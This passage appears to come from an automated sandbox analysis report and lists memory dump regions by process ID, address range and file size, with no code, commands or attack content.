                            • memory/3672-334-0x000002AEDA9D0000-0x000002AEDA9D1000-memory.dmp
                              Filesize

                              4KB

                            • memory/3672-335-0x000002AEDCCC0000-0x000002AEDCCC1000-memory.dmp
                              Filesize

                              4KB

                            • memory/3792-23-0x0000000000000000-mapping.dmp
                            • memory/4048-17-0x0000000000000000-mapping.dmp
                            • memory/4100-241-0x0000000000000000-mapping.dmp
                            • memory/4100-243-0x00000000723D0000-0x0000000072ABE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4100-244-0x0000000000080000-0x0000000000081000-memory.dmp
                              Filesize

                              4KB

                            • memory/4100-246-0x0000000002200000-0x0000000002201000-memory.dmp
                              Filesize

                              4KB

                            • memory/4100-262-0x000000000A500000-0x000000000A524000-memory.dmp
                              Filesize

                              144KB

                            • memory/4128-366-0x00007FF92B630000-0x00007FF92C01C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4128-359-0x0000000000000000-mapping.dmp
                            • memory/4212-124-0x0000000000970000-0x0000000000971000-memory.dmp
                              Filesize

                              4KB

                            • memory/4212-121-0x00000000701F0000-0x00000000708DE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4212-212-0x0000000006580000-0x000000000658D000-memory.dmp
                              Filesize

                              52KB

                            • memory/4212-206-0x00000000056F0000-0x00000000057A0000-memory.dmp
                              Filesize

                              704KB

                            • memory/4212-114-0x0000000000000000-mapping.dmp
                            • memory/4212-207-0x0000000005D70000-0x0000000005D71000-memory.dmp
                              Filesize

                              4KB

                            • memory/4220-260-0x0000000000000000-mapping.dmp
                            • memory/4256-282-0x0000000005630000-0x0000000005631000-memory.dmp
                              Filesize

                              4KB

                            • memory/4256-347-0x00000000075A0000-0x00000000075C3000-memory.dmp
                              Filesize

                              140KB

                            • memory/4256-273-0x0000000000DC0000-0x0000000000DC1000-memory.dmp
                              Filesize

                              4KB

                            • memory/4256-350-0x00000000077D0000-0x00000000077F4000-memory.dmp
                              Filesize

                              144KB

                            • memory/4256-269-0x0000000000000000-mapping.dmp
                            • memory/4256-272-0x0000000071FD0000-0x00000000726BE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4292-326-0x0000000000000000-mapping.dmp
                            • memory/4296-315-0x0000000000000000-mapping.dmp
                            • memory/4392-285-0x0000000000000000-mapping.dmp
                            • memory/4428-58-0x0000000000000000-mapping.dmp
                            • memory/4436-128-0x0000000000000000-mapping.dmp
                            • memory/4488-66-0x00000000701F0000-0x00000000708DE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4488-60-0x0000000000000000-mapping.dmp
                            • memory/4492-219-0x0000000000000000-mapping.dmp
                            • memory/4504-351-0x0000000000000000-mapping.dmp
                            • memory/4504-357-0x00007FF92B630000-0x00007FF92C01C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4508-131-0x0000000000000000-mapping.dmp
                            • memory/4532-62-0x0000000000000000-mapping.dmp
                            • memory/4540-362-0x0000000000000000-mapping.dmp
                            • memory/4612-364-0x0000000000000000-mapping.dmp
                            • memory/4616-349-0x0000000000000000-mapping.dmp
                            • memory/4616-356-0x0000000071FD0000-0x00000000726BE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4632-337-0x0000000009040000-0x0000000009073000-memory.dmp
                              Filesize

                              204KB

                            • memory/4632-330-0x0000000007D40000-0x0000000007D41000-memory.dmp
                              Filesize

                              4KB

                            • memory/4632-311-0x0000000000000000-mapping.dmp
                            • memory/4632-312-0x0000000071FD0000-0x00000000726BE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4632-319-0x0000000007910000-0x0000000007911000-memory.dmp
                              Filesize

                              4KB

                            • memory/4632-345-0x0000000009170000-0x0000000009171000-memory.dmp
                              Filesize

                              4KB

                            • memory/4632-344-0x0000000008DF0000-0x0000000008DF1000-memory.dmp
                              Filesize

                              4KB

                            • memory/4640-233-0x0000000000000000-mapping.dmp
                            • memory/4644-67-0x0000000000000000-mapping.dmp
                            • memory/4644-70-0x00000000701F0000-0x00000000708DE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4664-136-0x0000000000000000-mapping.dmp
                            • memory/4672-268-0x0000000000400000-0x0000000000420000-memory.dmp
                              Filesize

                              128KB

                            • memory/4672-266-0x000000000041A684-mapping.dmp
                            • memory/4672-265-0x0000000000400000-0x0000000000420000-memory.dmp
                              Filesize

                              128KB

                            • memory/4680-355-0x00007FF92B630000-0x00007FF92C01C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4680-348-0x0000000000000000-mapping.dmp
                            • memory/4724-363-0x00007FF92B630000-0x00007FF92C01C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4724-353-0x0000000000000000-mapping.dmp
                            • memory/4776-218-0x0000000000000000-mapping.dmp
                            • memory/4908-223-0x0000000071B80000-0x000000007226E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4908-221-0x0000000000000000-mapping.dmp
                            • memory/4908-229-0x00000000056D0000-0x0000000005721000-memory.dmp
                              Filesize

                              324KB

                            • memory/4908-226-0x0000000001590000-0x0000000001591000-memory.dmp
                              Filesize

                              4KB

                            • memory/4908-224-0x0000000000C50000-0x0000000000C51000-memory.dmp
                              Filesize

                              4KB

                            • memory/4920-157-0x0000000000000000-mapping.dmp
                            • memory/4964-325-0x00007FF92B630000-0x00007FF92C01C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4964-321-0x0000000000000000-mapping.dmp
                            • memory/4964-320-0x0000000000000000-mapping.dmp
                            • memory/4964-327-0x0000000000480000-0x0000000000481000-memory.dmp
                              Filesize

                              4KB

                            • memory/4980-297-0x0000000005850000-0x0000000005862000-memory.dmp
                              Filesize

                              72KB

                            • memory/4980-279-0x0000000000000000-mapping.dmp
                            • memory/4980-283-0x0000000071FD0000-0x00000000726BE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4980-288-0x0000000000EE0000-0x0000000000EE1000-memory.dmp
                              Filesize

                              4KB

                            • memory/4980-291-0x0000000001680000-0x0000000001681000-memory.dmp
                              Filesize

                              4KB

                            • memory/4980-299-0x000000000B3F0000-0x000000000B3F5000-memory.dmp
                              Filesize

                              20KB

                            • memory/5032-167-0x0000000000400000-0x0000000000498000-memory.dmp
                              Filesize

                              608KB

                            • memory/5032-165-0x000000000043FCC3-mapping.dmp
                            • memory/5104-169-0x0000000000417A8B-mapping.dmp
                            • memory/5104-173-0x0000000000400000-0x0000000000439000-memory.dmp
                              Filesize

                              228KB

                            • memory/5112-111-0x0000000000000000-mapping.dmp